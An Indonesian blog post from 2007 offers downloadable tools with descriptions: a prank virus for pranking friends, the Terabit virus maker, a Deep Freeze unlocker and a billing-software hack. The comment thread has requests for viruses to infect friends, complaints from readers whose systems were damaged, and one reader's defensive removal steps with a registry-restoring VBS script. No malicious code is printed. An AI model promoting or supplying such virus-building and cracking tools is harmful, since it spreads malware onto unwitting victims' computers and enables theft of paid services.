jump to navigation

Virus Maker Baru 11/08/2007

Posted by oasisnet in Cara Bikin Virus, Hacking, Virus.
trackback

temen temen masih pengen belajar tentang virus. berikut ini saya berikan program tambahan untuk membuat virus dan software lainnya yang sangat berguna bagi programer :
Jahilin Temen —>rar
Program kecil untuk iseng-iseng kerjaiin temen silahkan coba sendiri
Deepunfreez —zip
program kecil untuk membuka / menghack deefreze
Terabit virus maker.zip
program cara gampang membuat virus
Hackbiiling.zip
Program kecil untuk menghack billing explorer
Rampok v2.2.zip
Program kecil untuk mengembalikan regedit atau file yang terinfeksi virus
Antivirus_local.zip
Nah program yang satu ini berguna bagi yang pengen membuat antivirus sendiri. silahkan kembangkan sendiri ada source codenya juga loh…

Reff : http://free-mcafee-avg-update.blogspot.com/

Comments»

1. akuwied - 12/08/2007

[REQ] cara ngebuang virus Jahilin Temen gimana ya juragan……
bingung gw sumpah….?
thx

2. j3 - 13/08/2007

bikin virus untuk merusak situs apa ya….

3. nandang - 14/08/2007

tolong kasih tau cara pakenya, kirim lewat imel aja.
bravo

4. Asep suryadi - 20/08/2007

ADuh mas aku kebingungan tolong dong kasi tau tutorial tentang bikin virus yang lengkapppppp…………………

5. aji nich - 30/08/2007

tolong buatkan program penjurusan dong om….pake VB dan databasenya pake MY SQL yach….please…ane butuh bnget nich… thank’s sebelumnya…..

o..ya…ane pake ant vrs AVAST…update tane punya ga…minta dong

6. alex - 03/09/2007

eh caranya buang virus dari terabit maker gmn za?

7. Gii - 03/09/2007

gimana caranya hapus virus jahilin teman.
Gua kagak tau caranya?
mohon bantuannya donk

8. oasisnet - 03/09/2007

wow itu cara satu-satunya cuma dengan memformat komputer yang bersangakutan mas Gii

9. Se - 04/09/2007

mas kasitau dong cdky VBMaker please……….!!

10. MURHFI FAKHLEVI - 10/09/2007

siallll buattt loeee gara-gara gua coba virus jahilin teman (video lucu xiomiao.exe) komputer gua windowsnya hancurrrrrrrr!!!!!!

okey kalau loe bisa bwt virusnya pasti loe bisa buat antivirusnya
truz kalau loe bisa bwtnya TOP BUAT LOE,,, n tolong loe kirim antivirus ke email gua,,,, okey
Brooo…… gak pake lama brooo

11. benk2 - 12/09/2007

hello…bro!!aku mau minta tolong informasinya situs yg nyediain visual basic.6.0

12. oasisnet - 13/09/2007

tp kan coba virus baru??????

lu aja yang gak bisa mencobanya, itu aja kok reeeepppoooot

ntar aku kirimkan antivirusnya nya mas murhfi…:D

13. arif - 14/09/2007

bang kirim kan donk situs yang nyediain vbmaker 6.0

14. Budak Sukabumi - 26/09/2007

Hebat!Maju terus virus maker.Tp jgn lupa antivirus nya jg.Kasian jg tuh yg masih dlm tingkat user,apalagi yg sok tau komputer.Hehe…

15. MURHFI FAKHLEVI - 01/10/2007

ada virus yang jahil lagi gk,,,,

o ya bTw janJi adalaH huTang yaCh,,,,, hehehehe

16. parwata - 04/10/2007

HENTIKAN KEJAHATAN VIRUS “ VIDEO LUCU XIOMIAO “

akhirnya normal juga kompi-ku , setelah lelah berjuang melawan virus yg namanya “ video lucu xiomiao “ … emang ini virus kurang ajar bgt..
virus ini dibikin pake software virus creator yg namanya “ terabit virus maker “

buat ngilanginnya ada beberapa langkah :
1. copot hardisk , kemudian pindah ke kompi lain dijadiin slave
2. kemudian search file berikut :
a. nvsvc.exe
b. spoolsvr.exe
c. regsvr.exe
d. userinit32.exe
e. volume.exe
f. regsvc.exe
g. update.exe
h. csmm.exe
pd folder “ Windows “ yg ada di hardisk sampean .. kl ketemu delete aja ya .. kl ga ketemu ya uda biarin aja ga usah di search ulang , , salah satu file diatas pasti ada
3. kembaliin hardisk di kompi loe , teus jalanin window seperti biasa “ dijamin mouse uda ga gerak2 sendiri lagi & drive cd ga keluar masuk lagi “
4. belum cukup sampe disitu …itu baru ngebunuh file induknya yg load waktu start up … registri yg dibikin ama virus masih jalan lo
5. Copy scrip berikut & paste di notepad , lalu save dengan nama “ enable.vbs “.. ato terserah loe mau kasi nama apa yg penting ada ekstetion “ .vbs “

Dim WshShell

Set WshShell = WScript.CreateObject(“WScript.Shell”)

WshShell.RegWrite “HKCU\software\microsoft\windows\currentversion\policies\system\DisableRegistryTools”, “0”, “REG_DWORD” ‘gabung dalam satu line
WshShell.RegWrite “HKCU\software\microsoft\windows\currentversion\policies\system\DisableRegistryTools”, “0”, “REG_DWORD” ‘gabung dalam satu line

MsgBox “Akses registry & taskmanager telah kembali normal”, 4096, “ScareByte”
Lalu klik 2X file “enable.vbs” yg baru dibikin.. lalu tekan “ ctrl+alt+delete “ taskmanager & regedit uda normal deh
6. lewat taskmanager klik file / New task … ketik “ regedit “ buat buka registri editor
7. lewat regedit tekan tombol ctrl + F ..lalu search regkey “ NoDriveTypeAutoRun “
kalo dah ketemu ubah valuenya jadi “ 0 “ trus tekan tombol F3 buat search lagi key dengan nama yg sama .. cause ini virus buat regkey “NoDriveTypeAutoRun “ ga cuman satu aja.. kalo ketemu lg tinggal ubah aja valuenya jd “0”
8. ulangi langkah “ 7 “ tapi kali ini yg disearch adalah regkey :
a. NoRun
b. NoViewOnDrive
c. DisableCMD
9. restart koputernya…& your computer normal lagi deh

thanks….
salam Parwata

17. parwata - 06/10/2007

HENTIKAN KEJAHATAN VIRUS ” VIDEO LUCU XIOMIAO ”

akhirnya normal juga kompi-ku , setelah lelah berjuang melawan virus
yg namanya ” video lucu xiomiao ” … emang ini virus kurang ajar bgt..
virus ini dibikin pake software virus creator yg namanya ” terabit
virus maker ”

buat ngilanginnya ada beberapa langkah :
1. copot hardisk , kemudian pindah ke kompi lain dijadiin slave
2. kemudian search file berikut :
a. nvsvc.exe
b. spoolsvr.exe
c. regsvr.exe
d. userinit32.exe
e. volume.exe
f. regsvc.exe
g. update.exe
h. csmm.exe
pd folder ” Windows ” yg ada di hardisk sampean .. kl ketemu delete
aja ya .. kl ga ketemu ya uda biarin aja ga usah di search ulang , ,
salah satu file diatas pasti ada
3. kembaliin hardisk di kompi loe , teus jalanin window seperti biasa
” dijamin mouse uda ga gerak2 sendiri lagi & drive cd ga keluar masuk
lagi ”
4. belum cukup sampe disitu …itu baru ngebunuh file induknya yg load
waktu start up … registri yg dibikin ama virus masih jalan lo
5. Copy scrip berikut & paste di notepad , lalu save dengan nama ”
enable.vbs “.. ato terserah loe mau kasi nama apa yg penting ada
ekstetion ” .vbs ”

Dim WshShell
Set WshShell = WScript.CreateObject(“WScript.Shell”)
WshShell.RegWrite “HKCU\software\microsoft\windows\currentversion
\policies\system\DisableTaskMgr”, “0”, “REG_DWORD” ‘gabung dalam satu
line
WshShell.RegWrite “HKCU\software\microsoft\windows\currentversion
\policies\system\DisableRegistryTools”, “0”, “REG_DWORD” ‘gabung dalam
satu line
MsgBox “Akses registry & taskmanager telah kembali normal”,
4096,”ScareByte”

Lalu klik 2X file “enable.vbs” yg baru dibikin.. lalu tekan ” ctrl+alt
+delete ” taskmanager & regedit uda normal deh
6. lewat taskmanager klik file / New task … ketik ” regedit ” buat
buka registri editor
7. lewat regedit tekan tombol ctrl + F ..lalu search regkey ”
NoDriveTypeAutoRun ”
kalo dah ketemu ubah valuenya jadi ” 0 ” trus tekan tombol F3 buat
search lagi key dengan nama yg sama .. cause ini virus buat regkey
“NoDriveTypeAutoRun ” ga cuman satu aja.. kalo ketemu lg tinggal ubah
aja valuenya jd “0”
8. ulangi langkah ” 7 ” tapi kali ini yg disearch adalah regkey :
a. NoRun
b. NoViewOnDrive
c. DisableCMD
9. restart koputernya…& your computer normal lagi deh

thanks….
salam Parwata

18. parwata - 06/10/2007

sory bgt cara di coment no 16 yg gua posting ada kesalahan script buat enable taskmanage & regeditnya
>> tapi uda gua perbaiki di coment no 17
>> semoga komputermu normal lagi yah ….

thanks . parwata

19. oasisnet - 07/10/2007

thanks mas parwata semoga bermanfaat bagi dunia IT, sekali lagi thanks ya mas😀

20. Ga-Tau-Apa2 - 20/10/2007

sekedar informasi: coba dech buka : http://cassanova88.blogspot.com/ ada sesuatu yang menarik disitu.

21. kompi heal master yg lagi belajar - 30/10/2007

HAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHA
ADD AKU YA JADI FRIEENDS KAMU DI FS….?????????
KALO MAU COMPILE FS GUA JUGA GAPAPA. BUKA JA URL GUA. SILAHKAN U KIRIMI SPAM/APALAH YANG NGERUSAK KOMPI BIAR SKILL HEALING KOMPUTERKU BERTAMBAH

22. MURHFI FAKHLEVI - 30/10/2007

thaNk’s ya mas parwata ntar gw coba deCh
berhasiL atw kagaK,,,

23. SUSYONO - 29/11/2007

virus open cd rom memang sengaja tak coba, alhasil berhasil. pertanyaannya bagaimana cara ngembalian biar bagus lagi…

thank’s

24. pembobol_cerdas - 21/12/2007

Oi, gua kena tipu. cara ngilangin jahilin_temen gimana?

setan lu

kunjungin blog gua yah…

duniarusak.blogspot.com

25. aRai - 14/02/2008

rampok v2.0 bukanya untuk menyedot isi flash disk … kok disini buat mengembalikan regedit atau file yang terinfeksi virus ya … hehe😀

26. AnDre - 12/03/2008

BOS caranya download hack billing explorer gmn BOS…?bingung ak maklum maseh amatir…!hehehehehe thanks sebelumnya

27. ANDRE - 13/03/2008

Bos …nanya cara download hack billing explorer gmn bos maklum maseh amatiran…mohon jawaban nya segera fenting…thanks sebelumnya…..

28. j-DJ - 29/03/2008

eh kalo kita donlod virus jahilin temen komputer kita kena juga ga?

29. oasisnet - 31/03/2008

klau sekedar download aja tidak kena virus komputer mas j-DJ, tp kalau udah mas klik and jalankan programnya baru kompe nya kena virus jahilin komputer ……..

30. cooler - 15/06/2008

virus yg bikin kluar masuk CD-ROM dong minta samplenya ada yg mo uploadin ga??

31. rossie - 22/06/2008

alooooooooooooooooo
q mo nanya… kalo virus yg bisa menghack biling tu, bisa ngasih tau codenya ga?. q pengin coba… ato kalo bisa yg jahilin_temen.rar tu. couse q pgen kompi tmn q kna virus….
mnta codenya yah….

32. pembobol_superior - 22/06/2008

woyyy, cara ngilangin jailin_temen.rar gmna… lu nipu gw ya????

33. ragun - 18/07/2008

aduh apa yang kalian bicarakan aku ga ngerti nu…istilah nya ga pernah aku denger …tapi kalau tentang cangkul dan sabit, bru aku ngerti..heheheheh….lo da yang murah hati mau ngasi tau kirim lewat emailq ya……mouse q gerak2 sendiri lo…..virus to ya???
ragun_chie@yahoo.co.id

34. JAGK - 24/07/2008

MAS TLONG AKU DONG pc ku ter infeksi virus kernel gima cara dan anti virus apa yang cocok bantu aku

35. rieysha - 23/08/2008

virus??
mau virus untuk dianalisa..
atau mau nyoba2 virus??
kunjungi saja

http://anharku.freevar.com

segala kerusakan menjadi tanggung jawab pendownload..

by:rieysha

36. tores - 26/08/2008

saya butuh program buat bikin virus ni…..karna saya pengen jahilin teman saya. klo bisa…….kirim langkah langka nya y…!!!
kirim ke email aq
welsa.toresa@yahoo.co.id

37. sandi - 14/10/2008

aduh… klo bisa pda jgn jd CRACKER donk…tar kna karma…jadi white hacker aj….

38. sandi - 14/10/2008

aduh….jgd pda jadi CRACKER dong….tar malah kena karma…mending pada jadi hacker yang baek berbagi secara ikhlas kepada sesama hacker….hacker harusnya membabgun bukan merusak…pada mas2 hacker sekalian,gue ama loe smua….gue harap kita sesama hacker berbagilah ilmu bermanfaat bagi pemula….

39. sandi - 14/10/2008

aduh…jgn pda jd CRACKER donk….tar malah kena karma…mending saling berbagi ilmu dan jadi hacker yang baek….
eh,,buat para hacker,katanya ada kontes buat para hacker diindonesia ya???q malah baru aj denger…mang kontesnya kapan????

40. sandi - 14/10/2008

berbuatlah baik kepada sesama hacker….buat yang masih pemula jangan pada salah jalan ya….

buat mas2 sekalian,katanya da kontes buat para hacker ya???kapan….

41. LiaNis - 20/10/2008

yah kTny Habis PeraNg HacJer ma RuSia tp tunggu deh KeHAdiRAN dKOTA anda!!hehehehe
kaNg PARWATA tau 4NtiM4ksiaT apKah dy Jg aNggoTa virus Maker???

42. yuari - 22/10/2008

mas kalo ngisi seminar sebagai VM bisa ga???

rencananya qta mau bikin seminar tentang virus yang nanti akan mendatangkan VM dan pembasmi virus

rencana bulan desember

kira2 bisa ga mas????

Please banget di replay ya masss

43. roby - 04/11/2008

payah banget web ini, gua hga bisa ngedownload, kuciwa guah sama lo…. tolong doang jangan begitu kalo pengen berbagi safwere dan juga informasinya..

44. ansav - 19/11/2008

oh ya bagi lo orang2 sombong maka mati ja lo mua@…….

45. sandi - 19/11/2008

a tolong donk bantu ak gmn sich bikin virus ya buat iseng jah
ntr krimin ke sandi_craez@yahoo.com

46. sandi - 19/11/2008

a gman dasar jadi hacker

47. zeltrax - 21/11/2008

mas tolong siapapun tolong kirimin aku dong virusmakernya guwa penasaran ni ke amrizalkarimamrullah@yahoo.com

48. viant - 20/12/2008

mas gi gw pemula!!,,…gw minta tolong ma mZ2 yang uda mahir buat virus buat ngajarin gmn buat virus n cara menghilangkanya.gw minta tolong banget mz2 smw.tolong klo mz bersedia krim ke emailQ vhie_4nt@ymail.com

49. bentha - 28/12/2008

uie.,.

gimana cara na hack
https://oasisnet.wordpress.com/2007/08/11/virus-maker-baru/

ntar kasih ato yach..,

heeeee.,..

50. ohang - 14/01/2009

onde mande……. kyknya boleh juga nih…..

51. Canang - 16/01/2009

Gimana cara ngedownload freeware yang ada diatas??? Trutama rampok.zip. Gw gw bisa nich……..

Plese bantu ya…..

52. leoboy21 - 29/01/2009

ass.
mas tolong krim semua ny y ke e-mail ku
abiz aku penasaran bnget niy N jangan lupa kirim juga ya cara pake’ ny…….

saya tunggu lho

wss.

53. Sang laskar - 09/03/2010

softwarenya kok gak bisa aku download….

54. Andy Satria - 17/07/2010

bisa nggak mbuat virus hanya dengan mbuat notepad

55. kputra - 14/08/2010

hello, numpang cyberkill.wordpress.com thank

56. riza - 09/01/2011

bisa gak kirm cara pkknya ke emailku
riza.hamkary@yahoo.co.id


Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: